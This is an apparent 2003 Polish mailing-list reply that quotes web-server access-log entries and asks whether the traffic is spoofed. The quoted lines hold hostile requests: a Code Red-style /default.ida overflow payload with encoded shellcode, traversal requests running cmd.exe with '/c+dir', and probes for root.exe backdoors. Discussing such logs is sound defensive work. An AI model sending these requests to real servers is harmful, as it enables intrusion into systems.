On Sun, 19 Jan 2003, Ruf10 wrote: > on Sat, 18 Jan 2003 01:18:27 +0100 "Tomasz T. Ciaszczyk" <[EMAIL PROTECTED]> > wrote: > > > 61.55.142.76 - - [12/Jan/2003:14:07:15 +0100] "GET > > /default.ida?NNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNN%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u9090%u8190%u00c3%u0003%u8b00%u531b%u53ff%u0078%u0000%u00=a > > HTTP/1.0" 400 328 "-" "-" > > 209.105.192.82 - - [12/Jan/2003:14:41:23 +0100] "GET > > /scripts/..%255c%255c../winnt/system32/cmd.exe?/c+dir" 404 - "-" "-" > > 194.27.78.23 - - [12/Jan/2003:16:22:31 +0100] "GET /scripts/root.exe?/c+dir > > HTTP/1.0" 404 286 "-" "-" > > 194.27.78.23 - - [12/Jan/2003:16:22:34 +0100] "GET /MSADC/root.exe?/c+dir > > HTTP/1.0" 404 284 "-" "-" > > 194.27.78.23 - - [12/Jan/2003:16:22:44 +0100] "GET > > /c/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 294 "-" "-" > > 194.27.78.23 - - [12/Jan/2003:16:22:48 +0100] "GET > > /d/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 294 "-" "-" > i jeszcze coś: to chyba nie pochodzi z inetu, raczej ktoś spoofuje
dlaczego spoofing? tomcio tomasz grzegorz zaborowski --/-- operator sieci komputerowej, IFT, UWr. http://zabora.of.pl /-------------[ http://zas.ift.uni.wroc.pl [EMAIL PROTECTED] /-----------------------------[ 071 3759402 ---------------------------/-PHP-JAVA-SQL-CGI-HTML-UNIX-SECURE-NET-AMIGA